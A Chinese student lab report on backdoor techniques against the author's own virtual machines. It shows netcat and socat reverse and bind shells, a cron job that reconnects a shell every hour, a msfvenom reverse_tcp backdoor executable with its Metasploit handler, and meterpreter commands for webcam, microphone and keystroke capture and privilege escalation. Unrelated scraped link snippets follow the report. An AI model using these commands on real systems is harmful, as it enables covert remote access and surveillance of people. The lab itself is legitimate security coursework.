20155334 曹翔 Exp2 后门原理与实践
20155334 曹翔 Exp2 后门原理与实践
不多废话直接上实验过程,本实验的所有端口都是5334。
一、实验过程
查询主机Windows和虚拟机kali的ip地址:
- Windows获得Linux Shell
- 使用ncat.exe程序监听本机的5334端口:
- 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5334端口:
- Windows下成功获得了一个Kali的shell,运行ls指令如下:
- 使用ncat.exe程序监听本机的5334端口:
- Linux获得Windows Shell
- 使用 nc 指令监听端口:
- 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的端口:
- Kali下可以看到Windows的命令提示,可以输入Windows命令:
- 使用 nc 指令监听端口:
- 使用nc传输数据
- Windows下监听端口:
- Kali下连接到Windows的端口:
- 建立连接之后,就可以传输数据了:
- Windows下监听端口:
- 使用ncat实现文件传输
- 如图所示,先在windows中打开监听,然后在linux系统中发送文件:
- 文件保存在
C:\Users\DELL\Desktop\ncat
中:
- 如图所示,先在windows中打开监听,然后在linux系统中发送文件:
- 使用netcat获取主机操作Shell,cron启动
- 先在Windows系统下监听端口:
- 在Kali环境下用
crontab -e
编辑定时任务,选择编辑器也只会用vim了呀:
- 在最后一行添加
N * * * * /bin/netcat 172.168.3.2 5334 -e /bin/sh
,意思是在每个小时的第N分钟反向连接Windows主机的端口,就会启动cron。此处的我取N=48
:
- 当时间到指定分钟,就已经获得了Kali的shell:
- 先在Windows系统下监听端口:
- 使用socat获取主机操作Shell, 任务计划启动(此处本人主机Win8.1系统出现问题,打开任务计划程序的时候显示
找不到远程电脑
经过查询相关资料发现要将网络设置重置,为了防止出现以后上不了网的意外,就选择了新装win7的虚拟机,继续实验)- 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
下载安装socat软件,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数(可选)一栏填写
tcp-listen:5334 exec:cmd.exe,pty,stderr
,作用是把cmd.exe绑定到端口5334,同时把cmd.exe的stderr重定向到stdout上:
创建完成之后,可以发现之前创建的任务已经开始运行:
此时,在Kali环境下输入指令
socat - tcp:172.168.3.2:5334
,此时可以发现已经成功获得了一个cmd shell:
##### 很遗憾,截图没有 (:з」∠),我也很难过T_T
- 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
重头戏来了:
- 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=5334 -f exe > 5334_backdoor.exe
生成后门程序5334_backdoor.exe
:
- 通过nc指令将生成的后门程序传送到Windows主机上:
- 在Kali上使用
msfconsole
指令进入msf控制台,MSF打开监听进程设置payload,设置反弹回连的IP和端口:
命令 作用 use exploit/multi/handler 进入handler模式 set payload windows/meterpreter/reverse_tcp 设置payload show options 查看当前信息状态 set LHOST 设置LHOST set LPORT 设置LPORT exploit MSF开始监听 - 设置完成后,执行监听:
- 打开Windows上的后门程序:
- 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
- 输入指令
- 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
命令 | 作用 |
---|---|
record_mic | 截获一段音频 |
webcam_snap | 使用摄像头进行拍照 |
webcam stream | 使用摄像头进行录像 |
screenshot | 截屏 |
keyscan_start | 开始记录下击键的过程 |
keyscan_dump | 读取击键的记录 |
getuid | 查看当前用户 |
getsystem | 进行提权 |
想看使用摄像头拍的照片么?就不给你看,怕吓坏你······好吧,其实是我用的Win7虚拟机并没有使用电脑主机摄像头的驱动,所以就没有啦啦啦啦,
不过特别想看的话,诺,给你咯
不要怀疑,这就是我,嗯。
摄像头获取
二、实验中遇到的问题及解决
问题1:打开任务计划程序的时候显示找不到远程电脑
解决办法:应急办法选择了新装win7的虚拟机,后续解决办法将网络设置重置即可。
问题2:提权失败
解决办法:使用管理员权限运行windows里的,从kali传过去的后台程序5334_backdoor.exe。
三、问题回答:
例举你能想到的一个后门进入到你系统中的可能方式?
答:最常见的就是通过软件安装包的捆绑,此外还有以前学习信息安全技术基础时学到的将后台程序和文件一起制成压缩包,在解压的时候安装植入。例举你知道的后门如何启动起来(win及linux)的方式?
答:windows:启动任务计划程序、开机自启动、捆绑运行(这些360都能解决哎)linux:通过在cron中添加任务(目前就知道这一个,噗)。Meterpreter有哪些给你映像深刻的功能?
答:当然是获取摄像头啦,还有获取麦克风,这俩结合起来简直·····嗯······,喂喂,想啥呢??我说的可以当监控使用。如何发现自己有系统有没有被安装后门?
答:当然是360大法好啦,当然也不能总是依靠这些软件,还有别的方法,比如······腾讯电脑管家??
四、实验总结与体会
总的来说,这次实验带给我太多的感触和震撼,不得不说,这些后门软件的威力不容小觑,即使是最简单的,最低级的后门软件,都能实现这些看起很难实现,却的的确确发生的功能。很难想象在安全软件没有普及的时候,人们上网的风险有多高。这次实验让我更加的感谢360,要不是它首先免费·····额,应该是感谢老师,要不是您,我还不能够深刻的了解到这些后门程序的危害,我是认真的。
20155334 曹翔 Exp2 后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
随机推荐
- froala富文本编辑器与golang、beego,脱离ueditor苦海
一直用百度的ueditor,可是阿里云这种"wo chuo"的云上部署的beego做的服务,总是出现ueditor.all.min.js语法错误,清理浏览器缓存后又会好起来.本地调 ...
- Sql Server Express 2005提示"failed to generate a user instance of sql server "
解决方法: 修改连接字符串“Data Source=.\SQLEXPRESS;AttachDbFilename=|DataDirectory|\mydb.mdf;Integrated Security ...
- 3hibernate核心对象关系映射 xxx.hbm.xml
Hibernate的核心就是对象关系映射: 加载映射文件的两种方式: 第一种:<mapping resource="com/bie/lesson02/crud/po/employee. ...
- windows系统相关命令及问题排查实践
1. 如何查看哪个端口被哪个程序占用? Netstat –ano|findstr "80" ->找到监听80端口的pid tasklist|findstr “<PID号 ...
- Oracle 数据库 简单查询
select DISTINCT dept_id from s_emp; desc s_emp; ; --给入职3年以上员工发10万元年终奖 ; --列出职位是仓库管理员的名字和工资 select la ...
- (笔记)MySQL 之 Metadata Locking 研究(5.5版本)
MySQL5.5 中引入了 metadata lock. 顾名思义,metadata lock 不是为了保护表中的数据的,而是保护 database objects(元数据)的.包括表结构.sch ...
- 安装Tidb数据库出现SSD硬盘IOPS不到40000的错误
今天安装tidb数据库出现IOPS过低的问题,这里如果仅仅是测试的话我们可以降低这个值,大概遇到的问题是: 解决方法: 1.我们在中控机的目录下修改某个配置文件: [tidb@:vg_adn_tidb ...
- 极限编程核心价值:尊重(Respect)
原文:https://deviq.com/respect 极限编程核心价值:简单(Simplicity) 极限编程核心价值:沟通(Communication) 极限编程核心价值:反馈(Feedback ...
- 远程登录Linux(window下操作Linux)
参考文章:http://www.runoob.com/linux/linux-remote-login.html 1.Window系统上 Linux 远程登录客户端有SecureCRT, Putty, ...
- Mapreduce运行过程分析(基于Hadoop2.4)——(二)
4.3 Map类 创建Map类和map函数.map函数是org.apache.hadoop.mapreduce.Mapper类中的定义的,当处理每一个键值对的时候,都要调用一次map方法,用户须 ...